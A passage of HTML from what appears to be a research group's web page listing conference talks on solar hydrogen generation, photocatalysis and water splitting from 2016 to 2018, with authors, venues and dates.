<strong><u>M. Fronzi</u></strong>, J Bishop, M Toth, M Ford, “<strong>Controlling Surface
Patterning of Diamond: The Origin of Anisotropy with Electron Beam Induced Etching</strong>”,
American Physical Society Meeting, Los Angeles, California, USA, March 2018
</li>
<li>
<strong><u>M. Fronzi</u></strong>, O Mokhtari, Y Wang, H Nishikawa, “<strong>Long-term
reliability of Pb-free solder joint between copper interconnect and silicon in photovoltaic
solar
cell</strong>”, American Physical Society Meeting, Los Angeles, California, USA, March
2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On The Stability & Performance of Low-Cost Devices for Solar Hydrogen
Generation</strong>”, 3rd Fusion Conference on Molecules and Materials for Artificial
Photosynthesis, Cancun, Mexico, March 2018
</li>
<li>
<strong><u>M.C. Liu</u></strong>, L.J. Guo<span
class="invited">(<strong>Keynote</strong>)</span>,
“<strong>On Controlling of the Mass and Energy Flow for Efficient Photocatalytic Solar
H<sub>2</sub> Production</strong>”, 2nd International Summit on Energy Science and
Technology,
Xi’an, China, January, 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>On Solar Water Splitting</strong>”, 8th IEEE International Nanoelectronics
Conference (INEC2018), Kuala Lumpur, Malaysia, January 2018
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2017 (43)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="284">
<li>
<strong><u>Y.K. Wei</u></strong>, Z.Q. Wang, <strong>J. Wang</strong>, <strong>J.Z. Su</strong>,
<strong>L.J. Guo</strong>, “<strong>BiVO<sub>4</sub>-rGO-NiFe Nanoarrays Photoanode:
Oriented
Hierarchical Growth and Application for Photoelectrochemical Water Splitting</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong><u>J. Wang</u></strong>, <strong>M.L. Wang</strong>, <strong>T. Zhang</strong>, <strong>J.Z,
Su</strong>, <strong>L.J. Guo</strong>, “<strong>Facile Synthesis of Ultrafine Hematite
Nanowire Arrays for Efficient Charge Separation</strong>”, 15<sup>th</sup> International
Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong><u>I.R. Gutiérrez</u></strong>, R.G. Rodriguez, M.R. Perez, A.V. Poot, G.R. Gattorno, G.
Oskam, “<strong>Charge transfer dynamics at inkjet printed
<em>p</em>-CuBi<sub>2</sub>O<sub>4</sub> photocathodes for photoelectrochemical water
splitting</strong>”, 15<sup>th</sup> International Conference on Clean Energy (ICCE 2017),
Xi'an, China, December 2017
</li>
<li>
<strong><u>W.L. Fu</u></strong>, <strong>F. Xue</strong>, <strong>M.C. Liu</strong>, <strong>L.J.
Guo</strong>, “<strong>Kilogram-scale production of highly active chalcogenide
photocatalyst
for solar hydrogen generation</strong>”, 15<sup>th</sup> International Conference on Clean
Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong><u>Y.P. Yang</u></strong>, <strong>X. Zhang</strong>, <strong>L.J. Guo</strong>, H.T.
Liu,
“<strong>Local Degradation Phenomena in Proton Exchange Membrane Fuel Cells with
Dead-ended
Anode</strong>”, 15<sup>th</sup> International Conference on Clean Energy (ICCE 2017),
Xi'an,
China, December 2017
</li>
<li>
<strong><u>Z.D. Diao</u></strong>, <strong>D.M. Zhao</strong>, <strong>S.H. Shen</strong>,
“<strong>Polycrystalline Titanium Dioxide Nanofibers for Superior Sodium Storage</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong><u>F. Xue</u></strong>, <strong>W.L. Fu</strong>, <strong>L.J. Guo</strong>,
“<strong>NiS<sub>2</sub>
Nanodots Decorated g-C<sub>3</sub>N<sub>4</sub> Nanosheets: A High-efficiency, Low-cost, and
Long-term Photocatalyst for Improving Hydrogen Evolution</strong>”, 15<sup>th</sup>
International Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>M.T. Li</strong> <span class="invited">(<strong>Keynote</strong>)</span>, <strong>D.Y.
Liu</strong>, <strong>Y.C. Pu</strong>, “<strong>Photo/Electrocatalysis: Mechanistic
Insight
and Catalyst Design from Density Functional Theory</strong>”, 15<sup>th</sup>
International
Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>J.Z. Su</strong> <span class="invited">(<strong>Keynote</strong>)</span>, <strong>J.L.
Zhou</strong>, <strong>C. Liu</strong>, “<strong>Enhanced Charge Separation in
BiVO<sub>4</sub> Electrodes by Zn Surface Modification and Back Contact Cu Gradient Profile
Doping
for Photoelectrochemical Water Splitting</strong>”, 15<sup>th</sup> International
Conference
on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>Y.B. Chen</strong> <span class="invited">(<strong>Keynote</strong>)</span>, <strong>Z.X.
Qin</strong>, <strong>M.L. Wang</strong>, <strong>R. Li</strong>, “<strong>Rational Design
of
Noble-metal-free Catalysts for Hydrogen Evolution Reaction</strong>”, 15<sup>th</sup>
International Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>M.C. Liu</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Controlled
Photocatalytic Nanocrystal for Tunable Solar H<sub>2</sub> Production</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong>M. Fronzi</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Origin
of Topological Anisotropic Patterns in Gas Mediated Electron Beam Induced Etching</strong>”,
15<sup>th</sup> International Conference on Clean Energy (ICCE 2017), Xi'an, China, December
2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>On Photocatalytic Solar Hydrogen Generation</strong>”, 15<sup>th</sup>
International Conference on Clean Energy (ICCE 2017), Xi'an, China, December 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest advances & Challenges in Solar Water Splitting</strong>”,
1<sup>st</sup>
Frontiers in Electroceramics Workshop, Massachusetts Institute of Technology, Cambridge, MA,
USA,
December 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Design, performance and stability of low-cost materials for photocatalytic solar
water splitting</strong>”, 2017 MRS Fall Meeting, Symposium ES2: On the Way to Sustainable
Solar Fuels—New Concepts, Materials and System Integration, Boston, MA, USA, November 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Clean Energy from Seawater</strong>”, International Summit of the MRS
University Chapters on Sustainability & Nanotechnology, Boston, MA, USA, November 2017
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong>Invited</strong>)</span>,
<strong>Y.M.
Fu</strong>, <strong>W. Zhou</strong>, “<strong>Engineering Surface Structures and
Energetics
of α-Fe<sub>2</sub>O<sub>3</sub> and Si for Photoelectrochemical Water Splitting</strong>”,
18th International Conference of the Union of Materials Research Societies in Asia (IUMRS-ICA
2017),
Taipei, Taiwan, China, November 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest Advances in Water Splitting</strong>”, 18th International Union of
Materials Research Societies International Conference in Asia (IUMRS-ICA 2017), Symposium B2.
Photocatalysis and Photosynthesis, Taipei, Taiwan, China, November 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>On the low cost design, performance and stability of advanced electrodes for
photocatalytic (sea)water splitting</strong>”, 232nd Electrochemical Society Meeting,
Symposium on Photocatalysts, Photoelectrochemical Cells, & Solar Fuels 8, National Harbor, MD,
USA,
October 2017
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Modified Hematite and Silicon for Photoelectrochemical Water Splitting</strong>”,
International Conference on Functional Nanomaterials and Nanodevices, Budapest, Hungary,
September
2017
</li>
<li>
<strong>M.C. Liu</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Solar
Hydrogen Production via Photocatalysis: From Microscale Semiconductor Particle to Pilot Reaction
System</strong>”, UK-China International Particle Technology Forum VI 2017, Yangzhou,
China,
September 2017
</li>
<li>
<strong>M.C. Liu</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Complex
Photocatalysis via Simple Twinned Nanostructure</strong>”, 2017 China-UK Workshop on
Efficient
Energy Utilisation, Nanjing, China, August 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On low-cost photocatalytic water splitting</strong>”, XXVI International
Materials Research Congress, Symposium on Materials and Technologies for Energy Conversion,
Saving
and Storage (MATECSS), Cancun, Mexico, August 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the Design, Performance & Stability of Advanced Materials for Photocatalytic
Solar
Water Splitting</strong>”, XXVI International Materials Research Congress, 3rd
Mexico-China
Workshop on Nano Materials/Science/Technology: Renewable Energy and Environment Remediation
(NANOMXCN), Cancun, Mexico, August 2017
</li>
<li>
<strong><u>A. Hassanpour</u></strong>, <strong>L. Vayssieres</strong>, P. Bianucci,
“<strong>Optical
and Structural Properties of Arrays of Mg-doped ZnO Nanorods Prepared by a Low Temperature
Hydrothermal Method</strong>”, 18th Canadian Semiconductor Science & Technology
Conference,
Waterloo, ON, Canada, August 2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Modified Hematite Nanorods for Photoelectrochemical Water Splitting</strong>”, 7th
International Multidisciplinary Conference on Optofluidics, Singapore, July 2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Engineering of α-Fe<sub>2</sub>O<sub>3</sub> and p-Si for Efficient Solar Water
Splitting</strong>”,
33rd International conference of the Society for Environmental Geochemistry and Health (SEGH
2017),
Guangzhou, China, July 2017
</li>
<li>
<strong>M.C. Liu </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Nanotwin:
Simple Structure for Complex Photocatalysis</strong>”, 8th International Conference on
Hydrogen Production (ICH2P 2017), Brisbane, Australia, July 2017
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Engineered Hematite Nanorods for Efficient Photoelectrochemical Water Splitting</strong>”,
8th
International Conference on Hydrogen Production (ICH2P 2017), Brisbane, Australia, July 2017
</li>
<li>
<strong><u>J.W. Shi</u></strong>, <strong>Y.Z. Zhang</strong>, <strong>L.J. Guo</strong>,
“<strong>LaTiO<sub>2</sub>N-LaCrO<sub>3</sub>: Novel continuous solid solutions towards
enhanced photocatalytic H<sub>2</sub> evolution under visible-light irradiation</strong>”,
8th
International Conference on Hydrogen Production (ICH2P 2017), Brisbane, Australia, July 2017
</li>
<li>
<strong>M.C. Liu</strong>, “<strong>Seed-mediated Growth: A Versatile Method for
Understanding
Crystal Habits</strong>”, 9<sup>th</sup> World Congress on Materials Science and
Engineering,
Rome, Italy, June 2017
</li>
<li>
<strong><u>A. Hassanpour</u></strong>, <strong>L. Vayssieres</strong>, P. Bianucci,
“<strong>Optical
and Structural Properties of Arrays of Ni-doped ZnO Nanorods Prepared by a Low Temperature
Hydrothermal Method</strong>”, 12th International Conference On Optical Probes of Organic
and
Hybrid Semiconductors, Quebec city, QC, Canada, June 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On Artificial Photosynthesis for Solar Water Splitting and Hydrogen
Generation</strong>”, IEEE Summer School on Nanotechnology, Montreal, Quebec, Canada, June
2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Overview & Latest Advances in Aqueous Chemical Growth of Advanced
Hetero-Nanostructures</strong>”, 9<sup>th</sup> International Conference on Materials for
Advanced Technology (ICMAT), Symposium L on Novel Solution Processes for Advanced Functional
Materials, Suntec, Singapore, June 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the Design, Performance & Stability of Advanced Heteronanostuctures for Solar
Water Splitting</strong>”, 9<sup>th</sup> International Conference on Materials for
Advanced
Technology (ICMAT), Symposium F on Advanced Inorganic Materials and Thin Film Technology for
Solar
Energy Harvesting, Suntec, Singapore, June 2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineering
Surface Structures and Energetics of α-Fe<sub>2</sub>O<sub>3</sub> and p-Si for Efficient Solar
Water Splitting, Processes at the Semiconductor Solution Interface 7</strong>”, 231st
Meeting
of The Electrochemical Society, New Orleans, LA, USA, May-June 2017
</li>
<li>
<strong><u>A. Hassanpour</u></strong>, <strong>L. Vayssieres</strong>, P. Bianucci,
“<strong>Optical
and Structural Properties of Arrays of Mn-doped ZnO Nanorods Prepared by a Low Temperature
Hydrothermal Method</strong>”, 2017 CAP-Canadian Association of Physicists Congress,
Kingston,
ON, Canada, May-June 2017
</li>
<li>
<strong>L.Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>On the design of advanced materials for efficient and cost-effective solar
(sea)water
splitting</strong>”, 2017 Emerging Technologies Conference, Warsaw, Poland, May 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the Effects of Design, Interfacial Electronic Structure & Dimensions on the
Performance & Stability of Photoelectrodes for Solar Water Splitting</strong>”,
12<sup>th</sup> Pacific Rim Conference on Ceramic and Glass Technology including Glass & Optical
Materials Division Meeting (PacRim12), Symposium 10 on Multifunctional Nanomaterials and Their
Heterostructures for Energy and Sensing Devices, Kona, HI, USA, May 2017
</li>
<li>
<u>M. Chowdhury</u>, <strong>X.J. Guan</strong>, A. Pant, X.H. Kong, M. G. Kibria, H. Guo, F.
Himpsel, <strong>L. Vayssieres</strong>, Z. Mi, “<strong>High Efficiency and Highly Stable
Photocatalytic Overall Water Splitting on III-Nitride Nanowire Arrays</strong>”, 2017
Spring
MRS Meeting, Phoenix, AZ, USA, April 2017
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>Dimensional, Interfacial, and Confinement Effects on the Performance and
Stability of
Low-Cost Photoelectrodes for Solar Water Splitting</strong>”, 21<sup>st</sup> Topical
Meeting
of the International Society of Electrochemistry, Szeged, Hungary, April 2017
</li>
<li>
<strong>L.Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>Confinement effects in large bandgap oxide semiconductors</strong>”,
International Conference on Energy Materials Nanotechnology (EMN-East), Siem Reap, Cambodia,
March
2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited talk</strong>)</span>,
“<strong>Surface and Interface Engineered Heterostructures for Solar Hydrogen
Generation</strong>”, Symposium 1- Materials for Solar Fuel Production and Applications in
Materials Challenges, Materials Challenges in Alternative and Renewable Energy 2017 (MCARE
2017),
Jeju, South Korea, February 2017
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2016 (43)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="241">
<li>
<strong><u>J.B. Huang</u></strong>, <strong>L. Wang</strong>, <strong>C. Zhu</strong>, <strong>H.
Jin</strong>, “<strong>Catalytic Gasification of Guaiacol in Supercritical Water for
Hydrogen
Production</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat &
Mass
Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>H.J. Jia</u></strong>, <strong>Y.P. Yang</strong>, <strong>H.T. Liu</strong>,
<strong>L.J.
Guo*</strong>,“<strong>Systematic study on the effects of operation parameters on the
performance of open cathode PEM fuel cells</strong>”, 8<sup>th</sup> International
Symposium
on Multiphase Flow, Heat & Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China,
December
2016
</li>
<li>
<strong><u>J. Hu</u></strong>, X.Q. Wang, H.H. Yang, <strong>L.J. Guo*</strong>, “<strong>Strong
pH Dependence of Hydrogen Production with Glucose in Rhodobacter sphaeroides</strong>”,
8<sup>th</sup>
International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy Conversion
(ISMF2016),
Chengdu, China, December 2016
</li>
<li>
<strong><u>S.Y. Ye</u></strong>, <strong>L.J. Guo*</strong>, <strong>Q. Xu</strong>, <strong>Y.S.
Chen</strong>, <strong>Q.Y. Chen</strong>, “<strong>Investigation on Pressure Wave Induced
by
Supersonic Steam Jet Condensation in Water Flow in a Vertical Pipe</strong>”,
8<sup>th</sup>
International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy Conversion
(ISMF2016),
Chengdu, China, December 2016
</li>
<li>
<strong><u>R.Y. Wang</u></strong>, <strong>H. Jin</strong>, <strong>L.J. Guo*</strong>,
“<strong>Thermodynamic analysis of supercritical water gasification and dechlorination of
o-chlorophenol</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat
&
Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>W. Zhou</u></strong>, <strong>L.Y. He</strong>, <strong>S.H. Shen*</strong>,
“<strong>n-WO<sub>3</sub>/p-Si junctional photocathodes for efficient solar hydrogen
generation</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat &
Mass
Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>W.L. Fu</u></strong>, <strong>M.C. Liu</strong>, <strong>F. Xue</strong>, <strong>L.J.
Guo*</strong>, “<strong>Manipulating the Heterostructures of a Visible-Light-Driven
Composite
Photocatalyst by Controlling the Mass Transportation during Synthesis</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Noble-metal Free Artificial Photosynthesis Systems
for
Solar Hydrogen Generation</strong>”, 8<sup>th</sup> International Symposium on Multiphase
Flow, Heat & Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>J.F. Geng</u></strong>, <strong>Y.C. Wang</strong>, <strong>X.W. Hu</strong>,
<strong>D.W.
Jing*</strong>, “<strong>Experimental and Theoretical Analysis of Particle Transient
Transport
Phenomenon in Flowing Suspension</strong>”, 8<sup>th</sup> International Symposium on
Multiphase Flow, Heat & Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China, December
2016
</li>
<li>
<strong><u>H. Jin</u></strong>, <strong>L.J. Guo</strong>, <strong>Z.Q. Wu</strong>, <strong>X.
Zhang</strong>, <strong>J. Chen</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Novel ABO<sub>3</sub>-based Materials: Tailored Components and Structures towards
Photocatalytic H<sub>2</sub> Evolution under Visible-light Irradiation</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>J.W. Shi</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Novel
ABO<sub>3</sub>-based Materials: Tailored Components and Structures towards Photocatalytic
H<sub>2</sub> Evolution under Visible-light Irradiation</strong>”, 8<sup>th</sup>
International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy Conversion
(ISMF2016),
Chengdu, China, December 2016
</li>
<li>
<strong>M.C. Liu</strong> <span
class="invited">(<strong>Keynote & Session chair</strong>)</span>, “<strong>Controlling
Mass Transportation in Synthesizing Photocatalytic Nanocrystals for Solar H<sub>2</sub>
Production</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat &
Mass
Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>M. Fronzi</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Nano
cluster modified TiO<sub>2</sub> anatase and rutile surfaces for photo-catalytic
processes</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Low Cost HeteroNanostructures for Solar Hydrogen Generation</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Low Cost HeteroNanostructures for Solar Water Splitting</strong>”,
2<sup>nd</sup> Mexico-China Workshop on Nano: Materials / Science / Technology (NANOMXCN-2016),
Hong
Kong, China, December 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest advances in low cost semiconductor heteronanostructures for water
splitting</strong>”, 72<sup>nd</sup> American Chemical Society (ACS) Southwest Regional
Meeting, Symposium on Applications of Photonics in Energy and the Life Sciences, Galveston, TX,
USA,
November 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Low-cost HeteroNanostructures for Solar Water Splitting</strong>”,
3<sup>rd </sup>International Workshop on Advanced Materials and Nanotechnology, Hanoi, Vietnam,
November 2016
</li>
<li>
<strong><u>F.J. Niu</u></strong>, <strong>Y. Yu</strong>, <strong>S.H. Shen*</strong>, <strong>L.J.
Guo</strong>, “<strong>A Novel Hybrid Artificial Photosynthesis System with
MoS<sub>2</sub>
Embedded Carbon Nanofibers as Electron Relay and Hydrogen Evolution Catalyst</strong>”,
17<sup>th </sup>IUMRS International Conference in Asia (IUMRS-ICA2016), Qingdao, China, October
2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest development in design strategies for efficient solar water splitting
photoelectrodes</strong>”, 230<sup>th</sup> Electrochemical Society Meeting, Symposium
Photocatalysts, Photoelectrochemical Cells, and Solar Fuels 7, PRiME 2016, Honolulu, HI, USA,
October 2016
</li>
<li>
<strong><u>R. Song</u></strong>, <strong>B. Luo</strong>, <strong>D.W. Jing</strong>,
“<strong>Efficient Photothermal Catalytic Hydrogen Production over Nonplasmonic Pt Metal
Supported on TiO<sub>2</sub></strong>”, Solar Hydrogen and Nanotechnology XI, SPIE Optics
and
Photonics, San Diego, USA, August 2016
</li>
<li>
<strong><u>Y. Liu</u></strong><span class="invited"></span>, Y.H. Guo, J. Ager, <strong>M.T.
Li</strong>, “<STRONG>Fabrication of CoOx Layer on Porous BiVO<sub>4</sub> Film for Water
Splitting</STRONG>”, Solar Hydrogen and Nanotechnology XI, SPIE Optics and Photonics, San
Diego, USA, August 2016
</li>
<li>
<strong><u>Y. Liu</u></strong><span class="invited"></span>, <strong>S.H. Shen</strong> <span
class="invited">(<strong>Invited</strong>)</span>, “<strong>Heterostructures for
Photoelectrochemical and Photocatalytic Hydrogen Generation</strong>”, Solar Hydrogen and
Nanotechnology XI, SPIE Optics and Photonics, San Diego, USA, August 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the design of new low cost photocatalysts for efficient solar water
oxidation</strong>”, 252<sup>nd</sup> ACS National Meeting, Symposium on Solar Fuels:
Power to
the People, Philadelphia, PA, August 2016
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Heterostructures
for Solar Hydrogen Generation</strong>”, 3<sup>rd</sup> International Conference on
Electrochemical Energy Science and Technology (EEST2016), Kunming, China, August 2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On confinement, </strong><strong>surface </strong><strong>& dimensionality
effects in oxide semiconductors for solar water oxidation</strong>”, XXV International
Materials Research Congress, Symposium on Advances on Solar Fuels/Artificial Photosynthesis:
Materials and Devices, Cancun, Mexico, August 2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Low cost advanced materials design strategies for efficient solar energy
conversion</strong>”, XXV International Materials Research Congress, Symposium on
Materials
and Technologies for Energy Conversion, Saving and Storage (MATECSS), Cancun, Mexico, August
2016
</li>
<li>
<strong><u>D.M. Zhao</u></strong>, <strong>S.H. Shen*</strong>, <strong>L.J. Guo</strong>,
“<strong>ITO Electronic Pump Boosting Photocatalytic Hydrogen Evolution over Graphitic
Carbon
Nitride</strong>”, 2<sup>nd</sup> International Conference on Nanoenergy and Nanosystems
2016
(NENS2016), Beijing, China, July 2016
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineering
One-Dimensional Hematite Photoanodes for Solar Water Splitting</strong>”, 2<sup>nd</sup>
International Conference on Nanoenergy and Nanosystems 2016 (NENS2016), Beijing, China, July
2016
</li>
<li>
<strong>M.T. Li</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<span
lang="EN-GB"><strong>Photo/Electrocatalysis: Mechanistic Insight and Catalyst Design from Density Functional Theory</strong></span>”,
Global Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong><u>X.J. Guan</u></strong>, F. Chowdhury, <strong>L. Vayssieres</strong>, <strong>L.J.
Guo</strong>, Z. Mi, “<strong>Photocatalytic Seawater Splitting on Metal Nitride
Nanowires</strong>”, Global Forum on Advanced Materials and Technologies for Sustainable
Development, Symposium G2 on Functional Nanomaterials for Sustainable Energy Technologies,
Toronto,
Canada, June 2016
</li>
<li>
<strong><u>Y.B. Chen</u></strong> <span
class="invited">(<strong>Invited</strong>)</span>,<strong>
Z.X. Qin</strong>, <strong>X.J. Guan</strong>, <strong>M.C. Liu</strong>, “<strong>One-pot
Synthesis of Heterostructured Photocatalysts for Improved Solar-to-Hydrogen Conversion</strong>”,
Global Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong><u>M.C. Liu</u></strong>, <strong>X.X. Wang</strong>, <strong>L.
Zhao</strong>,“<strong>Shape-Controlled Metal/Semiconductor Nanocrystals in a
Well-Controlled
Kinetic Process and Their Application for Electrocatalysis or Photocatalysis</strong>”,
Global
Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional
Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong>M.C. Liu</strong>, “<strong>Crystal-facets Dependent Solar Hydrogen Generation
from
Kinetic Growth Controlled Nanoparticles</strong>”, 2<sup>nd</sup> International Symposium
on
Energy Conversion and Storage, Xiamen, China, June 2016
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<span
lang="EN-GB"><strong>New Design Strategy for Advanced Photocatalysts</strong></span>”,
Global Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the design of advanced photocatalysts for solar water splitting</strong>”,
Emerging Technologies 2016 Conference, Session on Optoelectronics & Photonics, Montreal, QC,
Canada, May 2016
</li>
<li>
<strong>S.H. Shen</strong>
<span class="invited">(<strong>Invited</strong>)</span>, “<strong>1D metal oxides for
solar
water splitting</strong>”, Workshop on Advanced Energy Materials & X-ray Spectroscopy,
Tamkang University, Taipei, May 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Interfacial and confinement effects in oxide semiconductors</strong>”,
Workshop
on Advanced Energy Materials & X-ray Spectroscopy, Tamkang University, Taipei, May 2016
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Solar
hydrogen: Harvesting light and heat from Sun</strong>”, Workshop on Advanced Energy
Materials
& X-ray Spectroscopy, Tamkang University, Taipei, May 2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Morphological, dimensional, and interfacial effects on oxide semiconductor
efficiency
for solar water splitting</strong>”, American Ceramic Society Materials Challenges in
Alternative & Renewable Energy 2016 Conference, Clearwater, FL, April 2016
</li>
<li>
<strong>L.Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>Latest Advances in Solar Water Splitting</strong>”, 2016 Spring MRS
Meeting,
Symposium EE2: Advancements in Solar Fuels Generation: Materials, Devices and Systems, Phoenix,
AZ,
March 2016
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong><span
lang="EN-GB">Latest Advances in Low Cost Solar Water Splitting</span></strong>”,
2<sup>nd</sup> Fusion Conference on Molecules and Materials for Artificial Photosynthesis,
Cancun,
Mexico, February 2016
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Nanodesigned
Materials for Photoelectrochemical and Photocatalytic Solar Hydrogen Generation</strong>”,
